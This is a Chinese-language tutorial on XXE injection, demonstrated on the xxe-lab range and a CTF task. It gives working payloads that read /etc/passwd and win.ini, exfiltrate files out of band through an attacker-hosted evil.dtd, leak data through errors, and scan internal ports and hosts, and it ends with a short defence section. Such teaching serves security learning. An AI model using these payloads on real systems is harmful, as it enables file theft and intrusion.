XXE&XML漏洞详解

这篇具有很好参考价值的文章主要介绍了XXE&XML漏洞详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.XML基础

  参考:https://www.cnblogs.com/bmjoker/p/9452222.html

1.1.XML基础介绍

  这里我对XML也不是太懂,无法对其进行解释,同时也怕解释出现错误,使其误导,这里我发一下参考链接。
  XML教程
  Extensible Markup Language (XML) 1.0

1.2.XML文档结构

  XML文档结构包括XML声明、DTD类型定义(可选)、文档元素,同时XXE漏洞和DTD文档相关,所以这里主要对DTD进行介绍。

<!--XML申明-->
<?xml version="1.0"?> 
<!--文档类型定义-->
<!DOCTYPE note [  <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)>  <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>     <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)>   <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)>   <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)>   <!--定义body元素为”#PCDATA”类型-->]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

1.3.DTD介绍

  文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML文档中(内部引用),也可作为一个外部引用。

内部声明DTD:<!DOCTYPE 根元素 [元素声明]>
引用外部DTD:<!DOCTYPE 根元素 SYSTEM "文件名">
DTD文档中有很多重要的关键字如下:
DOCTYPE(DTD的声明)
ENTITY(实体的声明)
SYSTEM、PUBLIC(外部资源申请)

  实体根据引用方式,还可分为内部实体与外部实体,看看这些实体的申明方式。

1.4.实体类介绍

  参数实体用%实体名称申明,引用时也用%实体名称;其余实体直接用实体名称申明,引用时用&实体名称。
  参数实体只能在DTD中申明,DTD中引用;其余实体只能在DTD中申明,可在xml文档中引用。
  内部实体:

<!ENTITY 实体名称 "实体的值">
外部实体:
<!ENTITY 实体名称 SYSTEM "URI">
参数实体:
<!ENTITY % 实体名称 "实体的值">
或者
<!ENTITY % 实体名称 SYSTEM "URI">

1.5.外部实体

  由于XXE漏洞主要是利用引入外部实体,而导致的漏洞,所以这里主要了解外部实体。而外部实体又分为很多的类型。这里面的类型一些是在之前比如文件包含等中提到的一些协议,以及未提及到的协议。
  外部实体在DTD中使用

<!ENTITY 实体名称 SYSTEM "URI">

  根据程序不同,能够引入的实体也是不同的,例如:
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

  外部实体演示:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [    
<!ENTITY content SYSTEM "file:///etc/passwd">]>
<foo>
        <value>&content;</value> 
</foo>

2.XXE漏洞基本介绍

  XXE漏洞,相对来说是比较难理解的,我在总结XXE的时候也是通过看视频以及看文章进行总结的,确实有很多的但是,感觉总结的也不是太好,但是基本上把相应的流程以及测试的方式都进行了总结。
  当然如果想细学,我的总结并不是很好,可以去网上的视频或者文章去参考参考。这里我也给一个比较好的参考的文章。
  一篇文章带你深入理解漏洞之 XXE 漏洞
  CTF XXE

2.1.XXE漏洞基本概念

  XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞。
  XML就是传输和存储数据的一个类型。
  XXE就是xml的漏洞注入的全称。

2.2.XXE漏洞危害

  XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

2.3.XXE漏洞输出形式

  XXE漏洞的输出显示分为:有回显、无回显。
  有回显就能够配合协议以及外部引入进行攻击。
  无回显就需要配合外部引入-反向链接配合。

2.4.XXE漏洞相关差异

  XML和HTML的差异
  XML被设计为数据传输和存储数据,其焦点是数据的内容。
  HTML被设计用来显示数据,其焦点是数据的外观。
  HTML指在显示信息,而XML指在传输数据。

3.XXE漏洞测试

  在测试中所有的语句基本上的固定格式,也就是说构建的payload基本上只需要修改调用协议,以及相关的参加即可,其它的格式,都是固定的可以直接使用。

3.1.有回显测试

  像之前提到的,如果有回显,那么就可以配合更多的协议或外部引入进行利用。那么这里就先简单测试一下有回显状态。

3.1.1.有回显案例

  这里我们使用xxe-labs靶场。下载链接:https://github.com/c0ny1/xxe-lab

3.1.1.1.测试回显位置

  通过测试,能够看到在admin位置是存在回显的,而后面的password位置的1是没回显的。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.1.1.2.构建payload

  构建payload后,也是成功的读取到了文件。

payload:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY name SYSTEM "file:///c://windows/win.ini">
]>
<user><username>&name;</username><password>1</password></user>

xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.无回显测试

  参考:https://xz.aliyun.com/t/3357#toc-0
  无回显的情况又称为blind xxe可以使用外带数据通道提取数据。而且在正常的环境下,服务器端通常都会把回显取消。因此我们解决该问题最好的办法就是使用外带的方式。
  其实也就是测试是否支持DTD引用外部实体。

3.2.1.无回显常规测试案例

3.2.1.1.关闭报错及输出

  这里我们先把XXElabs靶场的输出及报错都关闭,模拟无回显情况。在账号上面添加一个error_reporting(0);,然后在下面的echo $result;前面添加一个//,即可模拟成功。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.1.2.抓包测试

  这里我们首先抓包进行测试,可以发现不在出现报错,以及原来显示的位置也不在显示。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.1.3.构建payload

  这里需要在外部搭建一台vps,而这里我就直接使用虚拟机完成吧,无回显需要查看服务器的访问日志,当存在访问日志了,那么就可以证明是支持外部实体的,若不存在日志,则证明不支持外部实体,或者被WAF拦截。

payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY % shit SYSTEM "http://192.168.10.50/1.txt">
%shit;
]>

xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.1.4.查看服务器日志

  这里去攻击者服务器上查看一下日志,可以看到在服务器的访问日志中,查看到是存在一条访问日志的,那么就可以证明是支持外部实体的。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.2.无回显DNSlog测试案例

  上面的常规测试是需要我们自己搭建一个vps来进行测试,那么如果在刚开始测试的时候,不方便把自己的服务器地址暴露出来怎么办?

3.2.2.1.DNSlog方式

  通过DNSlog方式看服务器是否有DNS或者HTTP的请求。但是由于不确定因素以及处于安全角度来考虑使用外部的DNSlog不安全,那么可以使用burp中自带的有官方架设的默认公共服务器上的DNSlog服务器。
DNSlog位置:
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

  点击后,会弹出一个创建,复制子域名即可。当请求中就会在下面的窗口中显示相关的请求信息。同时这个窗口不能关闭,若关闭了,那么就会销毁相关的信息。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.2.2.构建payload

  其实这里的payload和之前的payload基本一致。这里需要注意的是,我们复制的子域名是没有http://的需要我们自己添加上去。所以修改下面的payload的时候只需要把http://后面的内容替换即可,设置好后,点击发送。

payload:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % d SYSTEM "http://azdvir9dgkpw9k7rvah25bccz35tti.burpcollaborator.net">
%d;
]>

xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.2.2.3.查看效果

  发送完成后,点击现在轮询,当然也可以在复制子域名后就开始轮询,这边可能需要稍等一会就能显示出来,因为设置的轮询是60秒。当看到结果后就可以判断是可以使用外部引入的。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

3.3.总结

  以上都是简单测试,以及了解相关的payload如何构建,下面才是真实的案例。

4.任意文件读取

  所谓的任意文件读取,其实也就是读取受害者服务器中的敏感文件。这里同样分为无回显和有回显操作。这里我们使用xxe-labs靶场做演示,之前有提到这个靶场在那下载。

4.1.有回显案例

4.1.1.抓包

  我们在打开靶场后,输入账号和密码后对其进行抓包,如何放到重放器中。当然这里的账号和密码随便输都行。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.1.2.构建payload

  我们通过构建的payload对Windows中的配置文件,进行读取,也是成功读取了。

payload:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ 
<!ENTITY rabbit SYSTEM "file:///c:/windows/win.ini" >
]>
<user><username>&rabbit;</username><password>123</password></user>

xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.2.无回显案例

4.2.1.修改配置文件

  这里为了演示修改,我们把xxelabs中的报错和回显都关闭。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.2.2.测试是否回显

  通过测试发现是,无法回显了,这里需要注意,若你还是存在回显,那么刷新一些页面重新加载一下。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.2.3.构建payload

  准备一台攻击服务器,当然本地的使用虚拟机即可,并且开启服务器的访问日志。在根目录下创建一个evil.dtd文件。

payload:
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://192.168.10.50/?data=%file;'>"
>
%all;

  然后构建攻击payload。

payload:
<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.10.50/evil.dtd">
%dtd;
%send;
]>

xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.2.4.查看访问日志

  这里的查看访问日志,是在攻击者的服务器上查看,不要搞错。可以通过下面的图片看到,我们成功获取到日志。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.2.5.查看日志内容

  由于是base64加密的,所以我们还需要对其进行解密,通过解密可以看到,日志的内容和Windows中的win.ini的内容是一样的。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.2.6.调用解释

  这里需要结合payload进行理解,不然单单看解释有点难理解。
  在构建的payload中会发现,可以看到挺难理解的,我们根据构建的payload进行解释一下,首先%dtd去调用vps上的evil.dtd文件,这个有点类似于将evil.dtd文件包含进来的感觉,然后调用evil.dtd文件中的%all,%all再去调用%file,而%file就会去获取服务器上面的敏感文件,然后将 %file 的结果填入到%send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,成功解决外带的情况。

4.3.基于报错案例

  基于报错的原理和无回显类似,无回显通过构造一个带外的url将数据带出,而基于报错是构造一个错误的url并将泄露文件内容放在url中,通过这样的方式返回数据。所以和无回显的构造方式几乎只有url出不同,其他地方一模一样。
  简答来说,报错就是将返回的数据,本该返回回去,但由于URL地址是错误的,那么就会出现报错,将数据显示在报错中。
  参考链接:https://blog.szfszf.top/tech/blind-xxe-%E8%AF%A6%E8%A7%A3-google-ctf-%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90/

4.3.1.引入服务器文件案例

  引入服务器文件的操作和无回显案例基本一致,就是上面提到的解释。

4.3.1.1.修改配置文件

  这里为了能够实现报错,需要在配置文件中,将不显示报错内容给注释了。需要将浏览器重新刷新一下,重新抓包。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.3.1.2.构建payload

  首先在攻击者服务器中创建evil.dtd文件,在文件中写入payload,在这个payload中会存在一个hhhhh的地方,原本在无回显中这里会写上服务器的IP地址,但是这里随便写一个不存在的地址,使其能够出现报错。

payload:
<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'file:///hhhhhhh/%file;'>">
%start;

  构建攻击的payload的语句。

payload:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://192.168.10.50/evil.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
%remote;
%send;
]>
<message>1234</message>
4.3.1.3.测试效果

  通过返回的数据包内容,可以看到原本应该出现在服务器日志中的编码的数据,现在在前端中了,而这就是基于报错的原因。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.3.1.4.编码还原

  我们对编码进行还原,查看效果。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

4.3.2.通过引入本地文件

  关于引入本地文件,通过上面的参考链接中的作者的话,这样可行,但是引入本地链接,我这边没有靶场,不好进行测试,如果感兴趣可以去作者的文章中去了解一些,但是,引入本地文件,必然不是一件容易的事。实现起来不管是引入外部或内部,都挺困难的。当然在黔驴技穷的时候,这也是一个不错的办法。

5.探测端口存活

  这里端口探测,经过测试,不管有没有回显,都只能靠响应时间来进行判断,这里如果不好判断,可以优先测试一下正常不会开放的端口,然后查看响应时长,然后再去测试一下,正常会开放的端口,例如:3389、80、443、22、23等端口。然后比较两个响应的时长,通常来说,端口开放了,响应会快一点,而端口未开放则响应会比较慢。

5.1.探测端口案例

  这里依旧是使用xxelabs靶场做演示,这里我也不改什么回显不回显的情况了,直接进行测试。

5.1.1.抓包

  这里把抓到的包放入重放器中。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.1.2.构建payload

  这里我开放了3389端口以及80端口,未开放22端口以及23端口。我们分别进行测试。
  这里有两种payload,一种是直接在回显位置修改,一种是不需要管回显位置的内容,同时这里面输入的IP是内网中你想要测试的IP地址以及后面的端口号。这里我只测试一个payload。

1.payload:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://192.168.10.50:3389" >]>
<user><username>&xxe;</username><password>123456</password></user>

2.payload:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://192.168.10.50:3389" >]>
<root>
<name>&xxe;</name>
</root>

5.1.3.测试开放端口

  这里首先测试3389端口和80端口,注意看右下角的响应时间。

5.1.3.1.测试3389端口

  在测试3389端口后,页面的响应时间为29毫秒。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.1.3.2.测试80端口

  可以看到,我们测试80端口,响应时间为67毫秒。当我们使用第一种payload的时候同时存在回显的话,页面中就会把80端口页面中的信息也显示出来了,这里测试的结果是不是就可以间接性读取内网中其它服务器的敏感文件?
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.1.4.测试未开放端口

  这里测试22端口以及23端口,主要看右下角响应时间,同时你也会发现一个问题。

5.1.4.1.测试22端口

  测试22端口后,响应的时间达到了1秒多,并且会发现,右下角之前都是中文,好像变成中文了,这里其实我也不太懂,因为我是这是中文汉化的,所以可能不能作为一个判断来处理,还是主要看响应时间吧。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.1.4.2.测试23端口

  其实测试23端口后,发现同样也是1秒多。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.2.自动化探测端口

5.2.1.抓包并修改

  这里还是一样将抓到的包,并添加payload。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.2.2.发送测试器

  将修改好的包发送到测试器中,然后进行爆破。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.2.3.设置变化内容

  首先将所有的自动选择的内容全部清除,然后将设定要变化的端口。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.2.4.设置载荷

  我这里为了测试方便,我就随便输入几个端口,输入端口完成后,点击开始攻击
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.2.5.查看攻击效果

  这里首先需要将列中接受响应计数勾上,然后点击接受响应计数,就会自动将最短的响应时长排在前面,这样我们就能够完成自动化测试了,无需手动测试,我这里挡住了,实在短时间的端口是3389和80,由于设置的时候多设置了一个3389,所有这里显示有3个短时间的。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

5.3.总结

  从响应的时间对比,其实不难看出,当端口开放的时候就可以响应时间就比较快,而端口未开放的时候响应时间就比较长。

6.探测主机存活

  这里的探测主机存活使用payload的以及判断和探测端口是基本上是一样的,只是将后面的端口取消,这里就放一个payload,需要注意哦,这里是基于xxelabs靶场构建的payload的。正常的payload可以看探测端口案例中构建的第二个payload,那个才是正常的。

payload:
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://192.168.10.51" >]>
<user><username>&xxe;</username><password>123456</password></user>

6.1.自动化探测主机存活

  这里我就不演示手动测试的了,只演示自动化的。

6.1.1.设置变化内容

  这里选中主机的最后一位,设置为变化的内容。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

6.1.2.设置载荷

  这里由于我就开一台虚拟机,是192.168.10.50,我们添加51、52,51与52我都没开启。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

6.1.3.查看攻击效果

  从攻击的效果的响应时长来看,也就50的通的,其它都是不通的。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

7.更改Content-Type类型

  这里就是解释在xxe的盲猜,在不确定是否能够执行的时候,通过修改Content-Type头,让其能够识别xml的语句,实现漏洞利用。更改Content-Type头类型有:application/xml与text/xml。

7.1.CTF题目案例

  CTF-Jarvis-OJ-Web-XXE(CTF题)访问地址

7.1.1.抓包

  通过抓包发现该靶场的数据的传输方式是json。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

7.1.2.修改类型

  这里我们需要将类型修改为xml。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

7.1.3.构建payload

  这里需要将原先下面输出的内容给删除,然后输入上payload。

payload:
<?xml version="1.0"?>
<!DOCTYPE ANY [ 
<!ENTITY b SYSTEM "file:///etc/passwd" >
]>
<x>&b;</x>

7.1.4.测试效果

  这里就可以看到我们成功读取到etc下的passwd内容。
xml注入漏洞,网络安全学习,# WEB安全总结笔记,xml,网络,安全,php,web安全

8.XXE漏洞防御

8.1.禁用外部实体

  使用开发语言提供的禁用外部实体的方法。

PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

8.2.过滤数据

  可以将用户提交的xml数据进行过滤,例如关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

9.参考

  https://blog.szfszf.top/tech/blind-xxe-%E8%AF%A6%E8%A7%A3-google-ctf-%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90/
  https://www.cnblogs.com/20175211lyz/p/11413335.html
  https://xz.aliyun.com/t/3357#toc-8文章来源地址https://www.toymoban.com/news/detail-780854.html

到了这里,关于XXE&XML漏洞详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全--XXE漏洞利用思路

    介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一

    2024年02月13日
    浏览(44)
  • 网络安全进阶学习第二十一课——XML介绍

    XML(eXtensible Markup Language),可扩展标记语言,是一种标记语言,使用简单标记描述数据;(另一种常见的标记语言是HTML) XML是一种非常灵活的语言, 没有固定的标签,所有标签都可以自定义 ; 通常 XML被用于信息的传递和记录 ,因此,xml经常被用于充当配置文件。如果把

    2024年02月06日
    浏览(48)
  • 【网络安全】初探SQL注入漏洞

    要想玩SQL注入,一个简单的数据交互页面是需要的,故我们用PHP做一个简易网页,有登录、注册和首页三块内容。 登录需要输入账号密码,等待提交后进入系统; 注册需要输入名字,密码,手机号,照片,等待提交后进入系统; 首页需要利用PHP和数据库联动后的查询语句,

    2024年02月16日
    浏览(43)
  • 【网络安全】「漏洞原理」(一)SQL 注入漏洞之概念介绍

    严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。 SQL 注入(SQL Injection) 是一种常见的网络攻击技术,它利用应用程序

    2024年02月06日
    浏览(50)
  • 【网络安全】「漏洞原理」(二)SQL 注入漏洞之理论讲解

    严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。 【点击此处即可获取282G网络安全零基础入门学习资源】 信息搜集在

    2024年02月06日
    浏览(50)
  • 【网络安全】SQL注入漏洞的修复建议

    SQL注入是Web应用程序常见的安全漏洞之一,攻击者通过恶意构造的SQL查询语句,成功在应用程序的数据库中执行任意操作,导致数据泄露、篡改或其他安全问题。 本篇技术博客将详细介绍SQL注入漏洞的修复建议,包括过滤危险字符和使用预编译语句,通过具体的代码案例帮助

    2024年02月06日
    浏览(52)
  • XML 注入漏洞原理以及修复方法

    漏洞名称 :XML注入 漏洞描述:可扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具 有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML是标准通用标记语言 (SGML) 的子集,非常适合Web 传输。

    2024年01月25日
    浏览(39)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(40)
  • 【网络安全】SQL注入详解

    SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 1:寻找到SQL注入的位置 2:判断服务器类型和后台数据库类型 3:针对不同的服务器和数据库特点进行SQL注入攻击

    2024年02月06日
    浏览(56)
  • 「 网络安全术语解读 」悬空标记注入详解

    引言:什么是悬空标记注入(Dangling markup injection)、典型利用原理是什么,以及如何防止悬空标记攻击? 悬空标记注入(Dangling markup injection)是一种技术,当由于输入过滤或其他防御措施而无法进行完全的跨站脚本攻击时,它可以用于捕获跨域数据。它可以被用来捕获其他

    2024年01月17日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包